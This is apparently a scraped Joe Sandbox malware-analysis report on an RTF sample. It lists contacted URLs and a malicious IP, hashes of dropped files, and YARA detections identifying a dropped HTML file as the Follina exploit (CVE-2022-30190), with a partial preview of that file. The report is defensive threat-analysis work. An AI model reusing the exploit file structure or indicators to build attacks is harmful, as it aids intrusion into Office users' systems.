                                                                                                                https://clients.config.office.net/user/v1.0/android/policies4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                  		high
                                                                                                                  https://entitlement.diagnostics.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                    		high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                      		high
                                                                                                                      https://substrate.office.com/search/api/v2/init4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                        		high
                                                                                                                        https://outlook.office.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                          		high
                                                                                                                          https://storage.live.com/clientlogs/uploadlocation4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office365.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                              		high
                                                                                                                              https://webshell.suite.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                		high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistory4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://management.azure.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://clients.config.office.net/c2r/v1.0/InteractiveInstallation4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorize4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://graph.windows.net/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://api.powerbi.com/beta/myorg/imports4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://devnull.onenote.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://ncus.pagecontentsync.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://messaging.office.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://augloop.office.com/v24EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://skyapi.live.net/Activity/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://clients.config.office.net/user/v1.0/mac4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                            		high

                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public IPs

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            13.250.15.191
                                                                                                                                                            		cyberleague.coUnited States
                                                                                                                                                            		16509AMAZON-02UStrue

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                            Analysis ID:639039
                                                                                                                                                            Start date and time: 03/06/202223:02:032022-06-03 23:02:03 +02:00
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 5m 10s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Sample file name:20220531_180800.rtf
                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                                            Number of analysed new started processes analysed:28
                                                                                                                                                            Number of new started drivers analysed:1
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal72.expl.evad.winRTF@5/15@2/1
                                                                                                                                                            EGA Information:Failed
                                                                                                                                                            HDC Information:Failed
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .rtf
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer

                                                                                                                                                            Warnings

                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.12.21, 52.109.76.34
                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            No simulations

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            13.250.15.19120220531_180800.rtfGet hashmaliciousBrowse

                                                                                                                                                              Domains

                                                                                                                                                              No context

                                                                                                                                                              ASNs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              AMAZON-02US20220531_180800.rtfGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://s3.amazonaws.com/nepasrepondre-notifications.canadapost-postescanada.ca32/AHdasgda4.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 52.217.64.70
                                                                                                                                                              https://indd.adobe.com/view/cb389d38-bc80-431d-8345-7de75cf5f11cGet hashmaliciousBrowse
                                                                                                                                                              • 13.224.103.25
                                                                                                                                                              https://online.pubhtml5.com/iuki/lvxf/Get hashmaliciousBrowse
                                                                                                                                                              • 108.138.199.39
                                                                                                                                                              https://app.pandadoc.com/document/147bd6920f1a81f0ef9bacb8624f0088ce2f4553?Get hashmaliciousBrowse
                                                                                                                                                              • 13.224.98.206
                                                                                                                                                              https://clt1439401.bmetrack.com/c/l?u=DC69C61&e=14461D7&c=15F6A9&t=1&l=7D4D8F67&email=89jMSQHVSHBwfz8oN8sDeXzBjzlZ2TJR&seq=1#YXNoYXJtYUBjb25kZW5hc3QuY29tGet hashmaliciousBrowse
                                                                                                                                                              • 44.240.32.226
                                                                                                                                                              vJfzYCjtYVGet hashmaliciousBrowse
                                                                                                                                                              • 34.220.228.175
                                                                                                                                                              doWIi2qXdiGet hashmaliciousBrowse
                                                                                                                                                              • 13.238.96.34
                                                                                                                                                              IyPYpW882XGet hashmaliciousBrowse
                                                                                                                                                              • 13.122.60.213
                                                                                                                                                              52eFMJemTwGet hashmaliciousBrowse
                                                                                                                                                              • 18.177.181.9
                                                                                                                                                              8zla0LeXmfGet hashmaliciousBrowse
                                                                                                                                                              • 13.230.157.212
                                                                                                                                                              11LbTZ3r9hGet hashmaliciousBrowse
                                                                                                                                                              • 13.33.250.171
                                                                                                                                                              https://download.clipgrab.org/clipgrab-3.9.7-dotinstaller.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.224.98.224
                                                                                                                                                              https://download.clipgrab.org/clipgrab-3.9.7-dotinstaller.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.224.98.224
                                                                                                                                                              https://linktr.ee/paul.kennedyGet hashmaliciousBrowse
                                                                                                                                                              • 13.224.103.107
                                                                                                                                                              https://www.evernote.com/shard/s745/sh/a8d8ce86-17ac-3321-0033-db5bac47f516/20e24f82ca6a653fbe24ec592a54a552Get hashmaliciousBrowse
                                                                                                                                                              • 52.41.81.16
                                                                                                                                                              EAET.apkGet hashmaliciousBrowse
                                                                                                                                                              • 76.223.55.44
                                                                                                                                                              deathtrump.x86Get hashmaliciousBrowse
                                                                                                                                                              • 44.250.190.218
                                                                                                                                                              tjW5CP15hqGet hashmaliciousBrowse
                                                                                                                                                              • 13.124.134.191
                                                                                                                                                              deathtrump.arm7Get hashmaliciousBrowse
                                                                                                                                                              • 99.81.21.100

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              ce5f3254611a8c095a3d821d44539877somefile2.ps1Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              DD37gnp1uW.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              VIP Invitation to Doha Expo 2023.docxGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              INV_R004671.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              File.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              dfas_telework_agreement 20731.jsGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              VkDJ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              0153AD4D1224B9A37B2EB3264EA7F8685828AB18C9C49.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              private_child_support_agreement_template 17845.jsGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              EISPv0c56U.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              ptSLEB5eM7.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              42VJPPTld4.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              585be0c57969f505e1ce900d1c0a7c10fc9f69a0e2e36.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              TT swift advise.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              jpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              jpoc.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              QoIEPSoS7k.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              05-2022-0438.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19https://s3.amazonaws.com/nepasrepondre-notifications.canadapost-postescanada.ca32/AHdasgda4.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Chrome.Quick.Update.ver.103.82.37782.jsGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Chrome.Quick.Update.ver.103.82.37782.jsGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Invoice_#6022022_PDF.htmGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://indd.adobe.com/view/cb389d38-bc80-431d-8345-7de75cf5f11cGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Fedex Invoice Receipt.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://haringlocati.com/Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              #Ud83d#Udd0a VN133184-112 .htmGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://online.pubhtml5.com/iuki/lvxf/Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://sergeandjonesconstruction.com/CTC/Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://hmrmicrosoftupdatecatalog.boxmode.io/Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://clt1439401.bmetrack.com/c/l?u=DC69C61&e=14461D7&c=15F6A9&t=1&l=7D4D8F67&email=89jMSQHVSHBwfz8oN8sDeXzBjzlZ2TJR&seq=1#YXNoYXJtYUBjb25kZW5hc3QuY29tGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              http://6IArJbN.media.yildirimyapimimarlik.com.#.aHR0cHM6Ly82SUFySmJOLmhha2lmbS5vci5rZSNkYXZpZC5nYWx2ZXpAc2t5YWlybGluZS5jb20=Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://lekig68557.clickfunnels.com/optinzn11mjrtGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              lnvoice#75229.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://ezaki-lab.littlestar.jp/2022DCON/service/sar/clients/cc.php?verificationGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Statement-98659-34.htmGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Storage Settings.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://linktr.ee/paul.kennedyGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://www.evernote.com/shard/s745/sh/a8d8ce86-17ac-3321-0033-db5bac47f516/20e24f82ca6a653fbe24ec592a54a552Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:Microsoft Access Database
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):528384
                                                                                                                                                              Entropy (8bit):0.47626507928862705
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:xGfXucJCIG8SFifZ0jGBwehKW8wtZ1IEj+hVZO4Fg:0fXnCZHOZmC18/EQI
                                                                                                                                                              MD5:521477A5B543DCDBDF650506A2BEF2FB
                                                                                                                                                              SHA1:7396544D2B6EB329AA33FE532F23ADDEE7B26C3C
                                                                                                                                                              SHA-256:BD9D10557EBF81AEEAE73A07771E9B212F8F574AA1814AE50CF135FD813DC71A
                                                                                                                                                              SHA-512:91B1F89180A11D9D0465CC39EE9A1333972C1AEA6B814862192322B16A44DF32DE2D997515367FC02036061728AB9AEA0D834EAE2C3B67A1E36815E2BF376077
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N-U.7...m.(...`.:{6^...Z.Cd..3..y[9.|*..|..... ..(..f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):36
                                                                                                                                                              Entropy (8bit):2.730660070105504
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                              MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                              SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                              SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                              SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):64
                                                                                                                                                              Entropy (8bit):1.3860360556164644
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:gdNSlNdaV:gG3u
                                                                                                                                                              MD5:705034BCC0EEF9FEDF492547A6248FDA
                                                                                                                                                              SHA1:582882F32AA3B4408443539B678D466383E7EBF7
                                                                                                                                                              SHA-256:19EC0E986BD9E829EE6FEB3FDFC5C52BBC0417294BF64EE33DF5D026E9C68F97
                                                                                                                                                              SHA-512:573B3B7328EB8875DDE1513A444D334CC07C1271766C064FCC396DCB337B1298888D23B0752CA1F927A2126AAAE6F1F3CD962E4E1BCCD4EE51C36DA7C0B064BB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:768287. Admin.

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):147863
                                                                                                                                                              Entropy (8bit):5.35893694438743
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:CcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:9HQ9DQW+zIXLI
                                                                                                                                                              MD5:CAD3616610DB963271F887DD70CC2E8F
                                                                                                                                                              SHA1:C24CC92A07D0846DD80F694620B9D17D765071F8
                                                                                                                                                              SHA-256:42F5BE14C77E0DDA5B870FFD88C8C03E9D43E6E630F125B1C2F1CE03CF98C9A6
                                                                                                                                                              SHA-512:E857B825E8592E7593CEF517BBE22514B873216664DA01980117B0E7580D0F70A0DC6D28FD009D7C84240E7EB403FE4AFA82FD87D942B9C5D84A3370C5DC9D90
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-03T21:03:08">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5092
                                                                                                                                                              Entropy (8bit):1.5689266993578892
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
                                                                                                                                                              MD5:DA03F3022C8E3A07A6F196216B29135E
                                                                                                                                                              SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
                                                                                                                                                              SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
                                                                                                                                                              SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\ADFF182E.emf

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4980
                                                                                                                                                              Entropy (8bit):3.8087894377622136
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:cqZDMN7gsdBgLfVTped//HksYHGui3DAjG6kpJoApdHk/O:cqi7lBSTped//qH3i3DAqXLE/O
                                                                                                                                                              MD5:5B29927367C1C2BEBE25499E5602DE05
                                                                                                                                                              SHA1:10EB42142920A3299851F183D624731B910C6FCE
                                                                                                                                                              SHA-256:820E5CFE32DD64E31AEE40837BC3730B1B0F810787A7D3AAFC700191E6551C68
                                                                                                                                                              SHA-512:CD1E48056BDCBDD8CE2C0B7C8E15CA645D26FF372CA68D20D6B3078580943D4D5FA68FEE84A0C1AAC86F275ACE0059A3F76C2AF402EEC918C6680549BAB2C2EC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:....l.............../................... EMF....t.......................p....... ...O................5..............................4...5...R...p...................................S.e.g.o.e. .U.I.................................................................................................................................................................................................................................................................................................................dv......%...................................r...............)............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EACEED93.jpeg

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=0], progressive, precision 8, 750x500, frames 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):91933
                                                                                                                                                              Entropy (8bit):7.9892937833237845
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:7JCBhGCgBEFzvY1kH0R1ngxcrXo3N0rKL1nvFhbbrC3PJ4+6JaZB5:UBkCgBEZPml3rY3NBpvFRbAhOJi5
                                                                                                                                                              MD5:A53C5995856D35B0097F80E38D258D33
                                                                                                                                                              SHA1:31099B09DCCAC8C4A1BAA7E1F1B14E6C80FC516F
                                                                                                                                                              SHA-256:E87E50F77EEC96A1F0E37FCA345001474B3A023EAABC8DBE6FB1989DCFCDA543
                                                                                                                                                              SHA-512:92C0748B624D9C2C8941C7720EF34C7EF7793589C19517FA4AAAF40C5BE3DCDE3F7C601D1D2B142AED5EFA92E50E5B449B2A61AAB96D22FBBF2B2C9F0EEFA1F6
                                                                                                                                                              Malicious:false
